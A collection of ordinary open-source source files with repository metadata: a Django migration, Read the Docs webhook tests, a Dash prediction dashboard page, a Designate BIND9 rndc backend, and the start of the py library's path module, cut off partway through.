"name": "Python",
"bytes": "1234325"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add a per-notification counter field to NotificationSent."""

    dependencies = [
        ('velkoja', '0001_initial'),
    ]

    operations = [
        migrations.AddField(
            model_name='notificationsent',
            name='notification_no',
            # existing rows are backfilled with notification_no=1
            field=models.PositiveIntegerField(default=1),
        ),
    ]
|
{
"content_hash": "56d81d0fa5cfdfe819dbb46dae833312",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 57,
"avg_line_length": 21.72222222222222,
"alnum_prop": 0.6086956521739131,
"repo_name": "rambo/asylum",
"id": "3ab22e8703c10adec75b71b31c9357607a5e367a",
"size": "415",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "project/velkoja/migrations/0002_notificationsent_notification_no.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "31215"
},
{
"name": "Dockerfile",
"bytes": "3192"
},
{
"name": "HTML",
"bytes": "9566"
},
{
"name": "JavaScript",
"bytes": "2309"
},
{
"name": "Python",
"bytes": "194588"
},
{
"name": "Shell",
"bytes": "5532"
}
],
"symlink_target": ""
}
|
from django.test import TestCase
import json
import logging
from readthedocs.projects.models import Project
from readthedocs.projects import tasks
log = logging.getLogger(__name__)
class GitLabWebHookTest(TestCase):
    """Exercise the /gitlab/ post-commit webhook endpoint."""

    fixtures = ["eric", "test_data"]

    def tearDown(self):
        # restore the real build task patched out in setUp
        tasks.update_docs = self.old_bd

    def setUp(self):
        # stub out the build task so webhook tests never trigger real builds
        self.old_bd = tasks.update_docs

        def mock(*args, **kwargs):
            log.info("Mocking for great profit and speed.")

        tasks.update_docs = mock
        tasks.update_docs.apply_async = mock

        self.client.login(username='eric', password='test')
        # representative GitLab push payload; the repository URL maps to the
        # 'read-the-docs' project in the test fixtures
        self.payload = {
            "object_kind": "push",
            "before": "95790bf891e76fee5e1747ab589903a6a1f80f22",
            "after": "da1560886d4f094c3e6c9ef40349f7d38b5d27d7",
            "ref": "refs/heads/awesome",
            "user_id": 4,
            "user_name": "John Smith",
            "user_email": "john@example.com",
            "project_id": 15,
            "repository": {
                "name": "Diaspora",
                "url": "git@github.com:rtfd/readthedocs.org.git",
                "description": "",
                "homepage": "http://github.com/rtfd/readthedocs.org",
                "git_http_url": "http://github.com/rtfd/readthedocs.org.git",
                "git_ssh_url": "git@github.com:rtfd/readthedocs.org.git",
                "visibility_level":0
            },
            "commits": [
                {
                    "id": "b6568db1bc1dcd7f8b4d5a946b0b91f9dacd7327",
                    "message": "Update Catalan translation to e38cb41.",
                    "timestamp": "2011-12-12T14:27:31+02:00",
                    "url": "http://github.com/mike/diaspora/commit/b6568db1bc1dcd7f8b4d5a946b0b91f9dacd7327",
                    "author": {
                        "name": "Jordi Mallach",
                        "email": "jordi@softcatala.org"
                    }
                },
                {
                    "id": "da1560886d4f094c3e6c9ef40349f7d38b5d27d7",
                    "message": "fixed readme",
                    "timestamp": "2012-01-03T23:36:29+02:00",
                    "url": "http://github.com/mike/diaspora/commit/da1560886d4f094c3e6c9ef40349f7d38b5d27d7",
                    "author": {
                        "name": "GitLab dev user",
                        "email": "gitlabdev@dv6700.(none)"
                    }
                }
            ],
            "total_commits_count": 4
        }

    def test_gitlab_post_commit_hook_builds_branch_docs_if_it_should(self):
        """
        Test the github post commit hook to see if it will only build
        versions that are set to be built if the branch they refer to
        is updated. Otherwise it is no op.
        """
        r = self.client.post('/gitlab/', {'payload': json.dumps(self.payload)})
        self.assertEqual(r.status_code, 200)
        self.assertEqual(r.content, '(URL Build) Build Started: github.com/rtfd/readthedocs.org [awesome]')
        self.payload['ref'] = 'refs/heads/not_ok'
        r = self.client.post('/gitlab/', {'payload': json.dumps(self.payload)})
        self.assertEqual(r.status_code, 200)
        self.assertEqual(r.content, '(URL Build) Not Building: github.com/rtfd/readthedocs.org [not_ok]')
        self.payload['ref'] = 'refs/heads/unknown'
        r = self.client.post('/gitlab/', {'payload': json.dumps(self.payload)})
        self.assertEqual(r.status_code, 200)
        self.assertEqual(r.content, '(URL Build) Not Building: github.com/rtfd/readthedocs.org []')

    def test_gitlab_post_commit_knows_default_branches(self):
        """
        Test the gitlab post commit hook so that the default branch
        will be respected and built as the latest version.
        """
        rtd = Project.objects.get(slug='read-the-docs')
        old_default = rtd.default_branch
        rtd.default_branch = 'master'
        rtd.save()

        self.payload['ref'] = 'refs/heads/master'
        r = self.client.post('/gitlab/', {'payload': json.dumps(self.payload)})
        self.assertEqual(r.status_code, 200)
        self.assertEqual(r.content, '(URL Build) Build Started: github.com/rtfd/readthedocs.org [latest]')

        # restore fixture state for other tests
        rtd.default_branch = old_default
        rtd.save()
class PostCommitTest(TestCase):
    """Exercise the /github/ post-commit webhook and the core /build/
    endpoint."""

    fixtures = ["eric", "test_data"]

    def setUp(self):
        # stub out the build task so webhook tests never trigger real builds
        def mock(*args, **kwargs):
            pass

        tasks.UpdateDocsTask.run = mock
        tasks.UpdateDocsTask.apply_async = mock

        self.client.login(username='eric', password='test')
        # representative GitHub push payload; the repository URL maps to the
        # 'read-the-docs' project in the test fixtures
        self.payload = {
            "after": "5ad757394b926e5637ffeafe340f952ef48bd270",
            "base_ref": "refs/heads/master",
            "before": "5b4e453dc913b08642b1d4fb10ed23c9d6e5b129",
            "commits": [
                {
                    "added": [],
                    "author": {
                        "email": "eric@ericholscher.com",
                        "name": "Eric Holscher",
                        "username": "ericholscher"
                    },
                    "distinct": False,
                    "id": "11f229c6a78f5bc8cb173104a3f7a68cdb7eb15a",
                    "message": "Fix it on the front list as well.",
                    "modified": [
                        "readthedocs/templates/core/project_list_detailed.html"
                    ],
                    "removed": [],
                    "timestamp": "2011-09-12T19:38:55-07:00",
                    "url": ("https://github.com/wraithan/readthedocs.org/"
                            "commit/11f229c6a78f5bc8cb173104a3f7a68cdb7eb15a")
                },
            ],
            "compare": ("https://github.com/wraithan/readthedocs.org/compare/"
                        "5b4e453...5ad7573"),
            "created": False,
            "deleted": False,
            "forced": False,
            "pusher": {
                "name": "none"
            },
            "ref": "refs/heads/awesome",
            "repository": {
                "created_at": "2011/09/09 14:20:13 -0700",
                "description": "source code to readthedocs.org",
                "fork": True,
                "forks": 0,
                "has_downloads": True,
                "has_issues": False,
                "has_wiki": True,
                "homepage": "http://rtfd.org/",
                "language": "Python",
                "name": "readthedocs.org",
                "open_issues": 0,
                "owner": {
                    "email": "XWraithanX@gmail.com",
                    "name": "wraithan"
                },
                "private": False,
                "pushed_at": "2011/09/12 22:33:34 -0700",
                "size": 140,
                "url": "https://github.com/rtfd/readthedocs.org",
                "watchers": 1
            }
        }

    def test_github_post_commit_hook_builds_branch_docs_if_it_should(self):
        """
        Test the github post commit hook to see if it will only build
        versions that are set to be built if the branch they refer to
        is updated. Otherwise it is no op.
        """
        r = self.client.post('/github/', {'payload': json.dumps(self.payload)})
        self.assertEqual(r.status_code, 200)
        self.assertEqual(r.content, '(URL Build) Build Started: github.com/rtfd/readthedocs.org [awesome]')
        self.payload['ref'] = 'refs/heads/not_ok'
        r = self.client.post('/github/', {'payload': json.dumps(self.payload)})
        self.assertEqual(r.status_code, 200)
        self.assertEqual(r.content, '(URL Build) Not Building: github.com/rtfd/readthedocs.org [not_ok]')
        self.payload['ref'] = 'refs/heads/unknown'
        r = self.client.post('/github/', {'payload': json.dumps(self.payload)})
        self.assertEqual(r.status_code, 200)
        self.assertEqual(r.content, '(URL Build) Not Building: github.com/rtfd/readthedocs.org []')

    def test_github_post_commit_knows_default_branches(self):
        """
        Test the github post commit hook so that the default branch
        will be respected and built as the latest version.
        """
        rtd = Project.objects.get(slug='read-the-docs')
        old_default = rtd.default_branch
        rtd.default_branch = 'master'
        rtd.save()

        self.payload['ref'] = 'refs/heads/master'
        r = self.client.post('/github/', {'payload': json.dumps(self.payload)})
        self.assertEqual(r.status_code, 200)
        self.assertEqual(r.content, '(URL Build) Build Started: github.com/rtfd/readthedocs.org [latest]')

        # restore fixture state for other tests
        rtd.default_branch = old_default
        rtd.save()

    def test_core_commit_hook(self):
        # the direct build endpoint should kick off a build and redirect
        # to the project's builds page
        rtd = Project.objects.get(slug='read-the-docs')
        rtd.default_branch = 'master'
        rtd.save()
        r = self.client.post('/build/%s' % rtd.pk, {'version_slug': 'master'})
        self.assertEqual(r.status_code, 302)
        self.assertEqual(r._headers['location'][1], 'http://testserver/projects/read-the-docs/builds/')
|
{
"content_hash": "f5ed3ee5ee689fc7f9de99527b7cf1eb",
"timestamp": "",
"source": "github",
"line_count": 216,
"max_line_length": 109,
"avg_line_length": 41.851851851851855,
"alnum_prop": 0.5388274336283185,
"repo_name": "stevepiercy/readthedocs.org",
"id": "0579ec337ad30affa92988a9080070511eacc48a",
"size": "9040",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "readthedocs/rtd_tests/tests/test_post_commit_hooks.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "4515"
},
{
"name": "CSS",
"bytes": "56305"
},
{
"name": "HTML",
"bytes": "198012"
},
{
"name": "JavaScript",
"bytes": "440641"
},
{
"name": "Makefile",
"bytes": "4594"
},
{
"name": "Python",
"bytes": "959642"
},
{
"name": "Shell",
"bytes": "367"
}
],
"symlink_target": ""
}
|
import json
import base64
import datetime
import io
import os
import glob
import pandas as pd
import numpy as np
import dash_table
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output, State
from app import app, indicator
from core import define
from core import prepare
from core import fselect
from core import evaluate
# Root folder that holds one sub-directory per uploaded market dataset
# (resolved relative to the process working directory).
current_path = os.getcwd()
MARKET_PATH = os.path.join(current_path, 'market')
# @functools.lru_cache(maxsize=32)
def parse_contents(contents, filename, date):
    """Decode a dcc.Upload payload into (DataFrame, filename, datetime).

    ``contents`` is the data-URL string produced by dash uploads
    ('<content_type>,<base64 payload>').  On any failure an html.Div
    error message is returned instead of the tuple (preserving the
    original error contract).
    """
    content_type, content_string = contents.split(',')

    decoded = base64.b64decode(content_string)
    try:
        if 'csv' in filename:
            # Assume that the user uploaded a CSV file
            df = pd.read_csv(
                io.StringIO(decoded.decode('utf-8')))
        elif 'xls' in filename:
            # Assume that the user uploaded an excel file
            df = pd.read_excel(io.BytesIO(decoded))
        else:
            # BUG FIX: unknown extensions previously fell through with
            # `df` unbound, raising UnboundLocalError at the return below;
            # route them through the existing error path instead
            raise ValueError('unsupported file type: {}'.format(filename))
    except Exception as e:
        print(e)
        return html.Div([
            'There was an error processing this file.'
        ])

    return df, filename, datetime.datetime.fromtimestamp(date)
def list_files_market():
    """Dropdown options for every CSV currently in the market folder."""
    pattern = os.path.join(MARKET_PATH, '*', '*.csv')
    names = (os.path.basename(path) for path in glob.glob(pattern))
    return [{"label": name, "value": name} for name in names]
def list_models(problem_type='classification'):
    """Return the model names available for ``problem_type``.

    Unknown problem types yield an empty list.
    """
    catalog = {
        'classification': [
            'AdaBoostClassifier', 'GradientBoostingClassifier',
            'BaggingClassifier', 'RandomForestClassifier',
            'KNeighborsClassifier', 'DecisionTreeClassifier',
            'MLPClassifier', 'ExtraTreesClassifier', 'SVC',
            'LinearDiscriminantAnalysis', 'GaussianNB',
            'LogisticRegression', 'VotingClassifier',
            'XGBoostClassifier', 'LGBMClassifier',
        ],
        'regression': [
            'AdaBoostRegressor', 'GradientBoostingRegressor',
            'BaggingRegressor', 'RandomForestRegressor',
            'KNeighborsRegressor', 'DecisionTreeRegressor',
            'MLPRegressor', 'ExtraTreesRegressor', 'SVR',
            'LinearRegression', 'BayesianRidge',
            'XGBoostRegressor', 'LGBMRegressor',
        ],
    }
    return catalog.get(problem_type, [])
def list_prepare():
    """Dropdown options for the available data scalers."""
    return [
        {"label": name, "value": name}
        for name in ('MinMaxScaler', 'Normalizer',
                     'StandardScaler', 'RobustScaler')
    ]
def list_select():
    """Dropdown options for the available feature selectors."""
    return [
        {"label": name, "value": name}
        for name in ('SelectKBest', 'PrincipalComponentAnalysis',
                     'ExtraTrees')
    ]
# Page layout for the "predict" tab: three rows of indicators, the sample /
# fill-values tables, a hidden div used as callback plumbing, and the
# predict/save button row.
layout = [
    html.Div([
        ########################### Indicators I ##################################
        # file-level indicators: problem type, filename, and the dataset picker
        html.Div(
            [
                indicator(
                    "#119DFF", "Type of Problem", "problem_type_predict_indicator"
                ),
                indicator(
                    "#119DFF", "Filename", "filename_predict_indicator"
                ),
                html.Div(
                    [
                        html.P(
                            'Uploaded files',
                            className="twelve columns indicator_text"
                        ),
                        dcc.Dropdown(
                            id="files_uploaded_predict_dropdown",
                            options=list_files_market(),
                            value="",
                            clearable=False,
                            searchable=False,
                            className='indicator_value'
                        ),
                    ],
                    className="four columns indicator",
                ),
                # indicatorii(
                #     "#EF553B",
                #     "Size",
                #     "right_leads_indicator",
                # ),
            ],
            className="row",
        ),
        # dash_table.DataTable(id='datatable-upload-container'),
        # dcc.Graph(id='datatable-upload-graph')
    ],
        className="row",
        style={"marginBottom": "10"},
    ),
    ########################### Indicators II ##################################
    # dataset-shape indicators
    html.Div(
        [
            indicator(
                "#00cc96", "Number of samples", "n_samples_predict_indicator"
            ),
            indicator(
                "#119DFF", "Number of features", "n_features_predict_indicator"
            ),
            indicator(
                "#EF553B",
                "Size in memory",
                "size_predict_indicator",
            ),
        ],
        className="row",
        style={"marginBottom": "10"},
    ),
    html.Hr(),
    ########################### Table results ##################################
    # left: read-only random sample; right: editable rows to predict on
    html.Div(
        [
            html.Div(
                [
                    html.P(
                        'Sample dataset',
                        className="twelve columns indicator_text"
                    ),
                    # html.Div(id='output-data-upload'),
                    dash_table.DataTable(
                        id='sample_predict_table',
                        # data=dff.to_dict('rows'),
                        # columns=[
                        #     {'name': i, 'id': i, 'deletable': True} for i in sorted(dff.columns)
                        # ],
                        style_header={
                            # 'backgroundColor': 'white',
                            'backgroundColor': '#248f24',
                            'color': 'white',
                            'fontWeight': 'bold'
                        },
                        style_cell_conditional=[{
                            'if': {'row_index': 'odd'},
                            'backgroundColor': 'rgb(248, 248, 248)'
                        }],
                        row_selectable="multi",
                        row_deletable=True,
                        # selected_rows=[0],
                        # pagination_settings={
                        #     'current_page': 0,
                        #     'page_size': 10
                        # },
                        # pagination_mode='be',
                        # sorting='be',
                        # sorting_type='single',
                        # sorting_settings=[]
                    )
                ],
                className="six columns",
            ),
            html.Div(
                [
                    # html.P("Agrupacion por cantidad de CPE"),
                    html.P(
                        'Fill values to predict',
                        className="twelve columns indicator_text"
                    ),
                    dash_table.DataTable(
                        id='fill_predict_table',
                        # data=dff.to_dict('rows'),
                        # columns=[
                        #     {'name': i, 'id': i, 'deletable': True} for i in sorted(dff.columns)
                        # ],
                        style_header={
                            # 'backgroundColor': 'white',
                            'backgroundColor': '#148f24',
                            'color': 'white',
                            'fontWeight': 'bold'
                        },
                        style_cell_conditional=[{
                            'if': {'row_index': 'odd'},
                            'backgroundColor': 'rgb(248, 248, 248)'
                        }],
                        row_selectable="multi",
                        row_deletable=True,
                        # selected_rows=[0],
                        editable=True,
                        # pagination_settings={
                        #     'current_page': 0,
                        #     'page_size': 10
                        # },
                        # pagination_mode='be',
                        # sorting='be',
                        # sorting_type='single',
                        # sorting_settings=[]
                    )
                ],
                className="six columns",
            ),
            # html.Div(id='metrics_predict_graph',
            #          className="four columns",
            #          ),
            # html.Div(id='fi_predict_graph',
            #          className="four columns"),
        ],
        className="row",
        style={"marginBottom": "10", "marginTop": "10"},
    ),
    ########################### Button ##################################
    # hidden div used as a no-display callback target
    html.Div(id='hidden_predict_div', style={'display': 'none'}),
    # html.Div(id='hidden_model_div'),
    html.Div(
        [
            html.Div(
                [
                    # submit button
                    html.Span(
                        "Predict values",
                        id="run_predict_button",
                        n_clicks=0,
                        # className="btn btn-primary"
                        className="button button--primary add"
                    ),
                    # dcc.Input(
                    #     id="output_chatbot",
                    #     placeholder="Respuesta de Adaline: ",
                    #     type="text",
                    #     value="",
                    #     disabled=True,
                    #     style={"width": "100%"},
                    # ),
                ],
                # className="six columns",
                className="two columns",
                # style={"paddingRight": "15"},
            ),
            html.Div(
                id='save_file_predict_div',
                className="two columns",
                # style={"paddingRight": "15"},
            ),
        ],
        className="row",
        style={"marginBottom": "10", "marginTop": "10"},
    ),
]
@app.callback(
    [Output('filename_predict_indicator', 'children'),
     Output('n_samples_predict_indicator', 'children'),
     Output('n_features_predict_indicator', 'children'),
     Output('size_predict_indicator', 'children'),
     Output('cat_features_predict_dropdown', 'options'),
     Output('cat_features_predict_dropdown', 'value'),
     Output('num_features_predict_dropdown', 'options'),
     Output('num_features_predict_dropdown', 'value'),
     Output('response_predict_dropdown', 'options'),
     Output('response_predict_dropdown', 'value'),
     Output('problem_type_predict_indicator', 'children'),
     Output('models_predict_dropdown', 'options'),
     Output('models_predict_dropdown', 'value')],
    [Input('files_uploaded_predict_dropdown', 'value')])
def update_metadata_predict(uploaded_file):
    """Refresh metadata indicators and feature/model dropdowns for the
    dataset chosen in the 'uploaded files' dropdown.

    Reads <MARKET_PATH>/<name>/<name>_meta.json.  With no selection
    (empty string) every indicator is blanked.
    """
    if uploaded_file != '':
        base = uploaded_file.replace('.csv', '')
        metadata_path = os.path.join(MARKET_PATH, base, base + '_meta.json')
        with open(metadata_path, 'r') as f:
            metadata = json.load(f)
        filename = uploaded_file
        n_samples = metadata['n_samples']
        n_features = metadata['n_features']
        num_features = metadata['num_features']
        cat_features = metadata['cat_features']
        response = metadata['response']
        problem_type = metadata['problem_type']
        size = metadata['size']
    else:
        filename = ''
        n_samples = ''
        n_features = ''
        size = ''
        cat_features = []
        num_features = []
        response = ''
        problem_type = ''

    num_options = [{"label": c, "value": c} for c in num_features]
    cat_options = [{"label": c, "value": c} for c in cat_features]
    response_options = [{"label": c, "value": c} for c in [response]]

    model_names = list_models(problem_type)
    models_options = [{"label": m, "value": m} for m in model_names]
    # BUG FIX: np.random.choice(..., 3, replace=False) raises ValueError when
    # fewer than 3 models are available -- which always happened with no file
    # selected (problem_type == '' -> empty model list).  Sample at most
    # len(model_names) names instead.
    k = min(3, len(model_names))
    models_value = np.random.choice(model_names, k, replace=False) if k else []

    return (filename, n_samples, n_features, size,
            cat_options, cat_features, num_options, num_features,
            response_options, response, problem_type,
            models_options, models_value)
@app.callback([Output('sample_predict_table', 'data'),
               Output('sample_predict_table', 'columns'),
               Output('fill_predict_table', 'data'),
               Output('fill_predict_table', 'columns')],
              [Input('files_uploaded_predict_dropdown', 'value')])
def show_tables_predict(uploaded_file):
    """Fill the 'sample dataset' and editable 'fill values to predict'
    tables with 10 random rows of the selected market dataset.

    Returns (sample_data, sample_columns, fill_data, fill_columns); all
    four entries are None when no file is selected.
    """
    if uploaded_file != '':
        print('tuning>>>>>', uploaded_file)
        metadata_folder = os.path.join(MARKET_PATH, uploaded_file.replace('.csv', ''))
        metadata_filename = uploaded_file.replace('.csv', '') + '_meta.json'
        metadata_path = os.path.join(metadata_folder, metadata_filename)
        with open(metadata_path, 'r') as f:
            metadata = json.load(f)
        filename_path = os.path.join(metadata_folder, uploaded_file)
        df = pd.read_csv(filename_path)
        # show a random sample of 10 rows
        df = df.sample(10)
        # df_predict = df.loc[:, df.columns != metadata['response']]
        df_predict = df.copy()
        # zero out the response column and rename it 'prediction' for the
        # editable table
        df_predict[metadata['response']] = np.zeros(len(df))
        df_predict.rename(columns={metadata['response']: 'prediction'}, inplace=True)
        columns_table=[
            {'name': i, 'id': i, 'deletable': True} for i in df.columns
        ]
        columns_table_predict=[
            {'name': i, 'id': i, 'deletable': True} for i in df_predict.columns
        ]
        # name = 'AdaBoostClassifier'
        # return tuple([plot, df.to_dict('rows'), columns_table, evaluator.plot_metrics(name)])
        return tuple([df.to_dict('rows'), columns_table,
                      df_predict.to_dict('rows'), columns_table_predict])
    return tuple([None for _ in range(4)])
@app.callback(
    Output('fill_predict_table2', "data"),
    [Input('fill_predict_table', "derived_virtual_data"),
     Input('fill_predict_table', "derived_virtual_selected_rows")],
    [State('files_uploaded_predict_dropdown', 'value')])
def show_prediction_predict(rows, selected_rows, uploaded_file):
    """React to row selection in the fill-prediction table.

    Loads the persisted model metrics and feature-importance JSON for
    the selected dataset, but the plotting/return logic is still
    commented out, so the callback currently only prints each selected
    row and implicitly returns None.
    NOTE(review): work in progress -- confirm the intended output for
    'fill_predict_table2' before relying on this callback.
    """
    # print('selected>>>', selected_rows)
    if selected_rows is None:
        selected_rows = []
    if len(selected_rows) > 0:
        # Per-dataset model artifacts live under <MARKET_PATH>/<stem>/model/.
        metadata_folder = os.path.join(MARKET_PATH, uploaded_file.replace('.csv', ''))
        folder_path = os.path.join(metadata_folder, 'model')
        path_metrics = os.path.join(folder_path, 'metrics.json')
        path_fi = os.path.join(folder_path, 'feature_importance.json')
        with open(path_metrics, 'r') as f:
            metrics = json.load(f)
        with open(path_fi, 'r') as f:
            fi = json.load(f)
        # Feature importances are stored as plain dicts; rebuild DataFrames.
        for k, v in fi.items():
            fi[k] = pd.DataFrame(v)
        list_figs_metrics = []
        list_figs_fi = []
        for index in selected_rows:
            print(rows[index])
            # model_name = rows[index]['Model']
            # evaluator = evaluate.Evaluate()
            # evaluator.problem_type = 'classification'
            #
            # # metrics
            # evaluator.metrics = metrics
            # fig_metrics = evaluator.plot_metrics(model_name)
            # list_figs_metrics.append(fig_metrics)
            #
            # # feature importance
            # evaluator.feature_importance = fi
            # fig_fi = evaluator.plot_feature_importance(model_name)
            # list_figs_fi.append(fig_fi)
    # return_figs_metrics = [dcc.Graph(figure=f) for f in list_figs_metrics]
    # return_figs_fi = [dcc.Graph(figure=f) for f in list_figs_fi]
    # return html.Div(return_figs_metrics), html.Div(return_figs_fi)
|
{
"content_hash": "07fb96c1f424385e5bd2e3a6b9ca2110",
"timestamp": "",
"source": "github",
"line_count": 449,
"max_line_length": 98,
"avg_line_length": 36.97104677060133,
"alnum_prop": 0.47457831325301203,
"repo_name": "gusseppe/pymach",
"id": "988f51ccb1fbeb2fc4e452ac33958d8be29b433e",
"size": "16624",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pymach/dashboard/apps/predict_front.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "28826"
},
{
"name": "Dockerfile",
"bytes": "119"
},
{
"name": "Makefile",
"bytes": "2291"
},
{
"name": "Python",
"bytes": "319018"
}
],
"symlink_target": ""
}
|
import random
from oslo_log import log as logging
from designate import exceptions
from designate import utils
from designate.backend import base
LOG = logging.getLogger(__name__)
DEFAULT_MASTER_PORT = 5354
class Bind9Backend(base.Backend):
    """Designate backend that provisions slave zones on a BIND9 server
    through the ``rndc`` command-line utility.
    """
    __plugin_name__ = 'bind9'

    def __init__(self, target):
        super(Bind9Backend, self).__init__(target)

        # rndc control-channel connection settings from the target options.
        self.rndc_host = self.options.get('rndc_host', '127.0.0.1')
        self.rndc_port = int(self.options.get('rndc_port', 953))
        self.rndc_config_file = self.options.get('rndc_config_file')
        self.rndc_key_file = self.options.get('rndc_key_file')

    def create_domain(self, context, domain):
        """Add ``domain`` as a slave zone transferring (AXFR) from this
        service's MiniDNS masters.

        Idempotent: an "already exists" failure from rndc is swallowed.
        """
        LOG.debug('Create Domain')
        masters = []
        for master in self.masters:
            host = master['host']
            port = master['port']
            masters.append('%s port %s' % (host, port))

        # Ensure different MiniDNS instances are targeted for AXFRs
        random.shuffle(masters)

        rndc_op = [
            'addzone',
            '%s { type slave; masters { %s;}; file "slave.%s%s"; };' %
            (domain['name'].rstrip('.'), '; '.join(masters), domain['name'],
             domain['id']),
        ]

        try:
            self._execute_rndc(rndc_op)
        except exceptions.Backend as e:
            # If create fails because the domain exists, don't reraise
            # NOTE(review): e.message is Python 2 style -- verify before
            # any py3 port.
            if "already exists" not in str(e.message):
                raise

    def delete_domain(self, context, domain):
        """Remove ``domain``'s zone from the BIND9 server.

        Idempotent: a "not found" failure from rndc is swallowed.
        """
        LOG.debug('Delete Domain')
        rndc_op = [
            'delzone',
            '%s' % domain['name'].rstrip('.'),
        ]

        try:
            self._execute_rndc(rndc_op)
        except exceptions.Backend as e:
            # If domain is already deleted, don't reraise
            if "not found" not in str(e.message):
                raise

    def _rndc_base(self):
        """Build the common argv prefix shared by every rndc invocation."""
        rndc_call = [
            'rndc',
            '-s', self.rndc_host,
            '-p', str(self.rndc_port),
        ]

        if self.rndc_config_file:
            rndc_call.extend(['-c', self.rndc_config_file])

        if self.rndc_key_file:
            rndc_call.extend(['-k', self.rndc_key_file])

        return rndc_call

    def _execute_rndc(self, rndc_op):
        """Run one rndc operation, wrapping any execution failure in
        ``exceptions.Backend``.
        """
        try:
            rndc_call = self._rndc_base()
            rndc_call.extend(rndc_op)
            # Pass args lazily so formatting only happens when DEBUG is on
            # (was eager '%'-interpolation).
            LOG.debug('Executing RNDC call: %s', " ".join(rndc_call))
            utils.execute(*rndc_call)
        except utils.processutils.ProcessExecutionError as e:
            LOG.debug('RNDC call failure: %s', e)
            raise exceptions.Backend(e)
|
{
"content_hash": "5dd6b32ec0dbfad07f50a79b63651051",
"timestamp": "",
"source": "github",
"line_count": 89,
"max_line_length": 76,
"avg_line_length": 29.8876404494382,
"alnum_prop": 0.5409774436090226,
"repo_name": "cneill/designate",
"id": "ea256180c9a69cdbc3ee3d15f33f8dcbf1e0335e",
"size": "3278",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "designate/backend/impl_bind9.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "7596"
},
{
"name": "JavaScript",
"bytes": "1378"
},
{
"name": "Python",
"bytes": "1866778"
},
{
"name": "Ruby",
"bytes": "4238"
},
{
"name": "Shell",
"bytes": "13350"
}
],
"symlink_target": ""
}
|
"""
"""
import os, sys, posixpath
import py
# Moved from local.py.
# True on native win32 CPython, or on Jython running on Windows
# (where os._name == 'nt').
iswin32 = sys.platform == "win32" or (getattr(os, '_name', False) == 'nt')
class Checkers:
    """Evaluate keyword-style path predicates (backs ``PathBase.check``),
    e.g. ``path.check(file=1, link=0)``."""
    # Predicates that can only hold if the path exists; consulted as a
    # fallback when stat-ing the path raises (see _evaluate).
    _depend_on_existence = 'exists', 'link', 'dir', 'file'
    def __init__(self, path):
        self.path = path
    def dir(self):
        # Implemented by concrete (local/svn) checker subclasses.
        raise NotImplementedError
    def file(self):
        raise NotImplementedError
    def dotfile(self):
        # A "dotfile" is any basename starting with '.'.
        return self.path.basename.startswith('.')
    def ext(self, arg):
        # Accept the extension with or without the leading dot.
        if not arg.startswith('.'):
            arg = '.' + arg
        return self.path.ext == arg
    def exists(self):
        raise NotImplementedError
    def basename(self, arg):
        return self.path.basename == arg
    def basestarts(self, arg):
        return self.path.basename.startswith(arg)
    def relto(self, arg):
        return self.path.relto(arg)
    def fnmatch(self, arg):
        return self.path.fnmatch(arg)
    def endswith(self, arg):
        return str(self.path).endswith(arg)
    def _evaluate(self, kw):
        """Return True iff every ``name=value`` predicate in *kw* holds.

        A 'not' prefix inverts a checker (e.g. ``notfile=1``).  Checkers
        that take an argument are called with the value; flag-style
        checkers have their boolean result compared against the value.
        """
        for name, value in kw.items():
            invert = False
            meth = None
            try:
                meth = getattr(self, name)
            except AttributeError:
                if name[:3] == 'not':
                    invert = True
                    try:
                        meth = getattr(self, name[3:])
                    except AttributeError:
                        pass
            if meth is None:
                raise TypeError(
                    "no %r checker available for %r" % (name, self.path))
            try:
                # Checkers with an extra argument (beyond self) get the value.
                if py.code.getrawcode(meth).co_argcount > 1:
                    if (not meth(value)) ^ invert:
                        return False
                else:
                    # Flag checker: compare truth values (xor with invert).
                    if bool(value) ^ bool(meth()) ^ invert:
                        return False
            except (py.error.ENOENT, py.error.ENOTDIR, py.error.EBUSY):
                # EBUSY feels not entirely correct,
                # but its kind of necessary since ENOMEDIUM
                # is not accessible in python
                # Path is inaccessible: positive existence-dependent checks
                # must fail; their negations must hold.
                for name in self._depend_on_existence:
                    if name in kw:
                        if kw.get(name):
                            return False
                    name = 'not' + name
                    if name in kw:
                        if not kw.get(name):
                            return False
        return True
class NeverRaised(Exception):
    """Sentinel exception type that nothing ever raises; used as the
    default 'ignore' class so visit() reports every error."""
    pass
class PathBase(object):
    """ shared implementation for filesystem path objects."""
    # Predicate evaluator used by check(); subclasses may substitute a
    # platform-specific Checkers subclass.
    Checkers = Checkers
    def __div__(self, other):
        # Support "path / 'segment'" joining syntax (Python 2 operator).
        return self.join(str(other))
    __truediv__ = __div__ # py3k
    def basename(self):
        """ basename part of path. """
        return self._getbyspec('basename')[0]
    basename = property(basename, None, None, basename.__doc__)
    def dirname(self):
        """ dirname part of path. """
        return self._getbyspec('dirname')[0]
    dirname = property(dirname, None, None, dirname.__doc__)
    def purebasename(self):
        """ pure base name of the path."""
        return self._getbyspec('purebasename')[0]
    purebasename = property(purebasename, None, None, purebasename.__doc__)
    def ext(self):
        """ extension of the path (including the '.')."""
        return self._getbyspec('ext')[0]
    ext = property(ext, None, None, ext.__doc__)
    def dirpath(self, *args, **kwargs):
        """ return the directory Path of the current Path joined
        with any given path arguments.
        """
        return self.new(basename='').join(*args, **kwargs)
    def read_binary(self):
        """ read and return a bytestring from reading the path. """
        with self.open('rb') as f:
            return f.read()
    def read_text(self, encoding):
        """ read and return a Unicode string from reading the path. """
        with self.open("r", encoding=encoding) as f:
            return f.read()
    def read(self, mode='r'):
        """ read and return a bytestring from reading the path. """
        with self.open(mode) as f:
            return f.read()
    def readlines(self, cr=1):
        """ read and return a list of lines from the path. if cr is False, the
        newline will be removed from the end of each line. """
        if not cr:
            content = self.read('rU')
            return content.split('\n')
        else:
            f = self.open('rU')
            try:
                return f.readlines()
            finally:
                f.close()
    def load(self):
